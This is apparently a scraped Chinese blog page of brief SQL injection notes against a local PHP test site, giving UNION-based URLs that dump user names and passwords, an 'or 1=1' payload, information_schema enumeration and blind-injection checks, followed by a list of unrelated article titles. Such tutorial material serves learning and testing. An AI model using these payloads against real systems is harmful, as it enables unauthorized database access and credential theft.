当前位置:网站首页>SQL injection
SQL injection
2022-07-19 05:19:00 【dafeng2773】
http://localhost/index.php?id=33 UNION SELECT 1,user,pass,4 from jokedb.users
// Query all the data
http://localhost/index.php?id=0 or 1=1
--UNION Inject and crack user name and password
select TABLE_SCHEMA FROM information_ schema.TABLES // Database name
// Guess the table name
http://localhost/index.php?id=33 UNION select 1,TABLE_NAME,3,4 FROM information_schema.TABLES where TABLE_SCHEMA='jokedb'
// Guess the field name
select column_name from information_schema.columns where TABLE_SCHEMA='jokedb' and TABLE_NAME='users';
// Query user name and password
http://localhost/index.php?id=33 UNION SELECT 1,user,pass,4 from jokedb.users
// Blind note function
select if(1=1,'tiger','monkey')
// Guess whether the table name exists
SELECT * FROM region WHERE (id = 33) and 1<(select count(*) from jokedb.xss )
边栏推荐
- 实习项目2-主页配置-我的数据模块
- Use echars to realize water drop, ring, segmentation, stacking, organization chart, map outline and other charts
- STL容器——map的基本操作
- 2020-11-10
- 运维安全要了解的二三事
- 循环赛制日程表问题
- Excel imports long data and changes to 000 at the end
- Leetcode53. maximum subarray and
- [AI] action recognition using simple neural network -- Based on coco key points
- STL container - basic operation of vector
猜你喜欢

MySQL optimization

Applet cloud development form submission and data acquisition in the page

Excel计算本月剩余天数

Uni app conditional compilation ifdef ENDIF compatible with multiple terminals

uniapp中使用ucharts图表,饼状图,柱状图,折线图

小程序云开发 上传图片到云存储

Cesium bind mouse events and remove mouse events

Shell script configures root to login to other hosts without secret

网络命令:网卡信息,netstat,arp

es6新增-Symbol数据类型
随机推荐
Internship project 1 - personalized homepage configuration
Two methods of obtaining URL parameters and various methods of obtaining location objects
Wechat applet wx Setclipboarddata copy text
手把手教你复现Log4j2核弹级漏洞
运维安全要了解的二三事
Two methods of rotation chart and automatic rotation
Easypoi excel simple export
Nacos配置管理
Cesium 綁定鼠標事件和移除鼠標事件
轮播图移动速度(匀速,缓动)案例归总
es6新增-数组/对象的解构赋值
es6新增-Symbol数据类型
2020-11-10
Excel imports long data and changes to 000 at the end
markdown笔记以及Typora相关快捷键
JS native object plus attributes
[ES6] quickly print user information to the page
第一个智能合约程序Faucet.sol
循环赛制日程表问题
Uni app conditional compilation ifdef ENDIF compatible with multiple terminals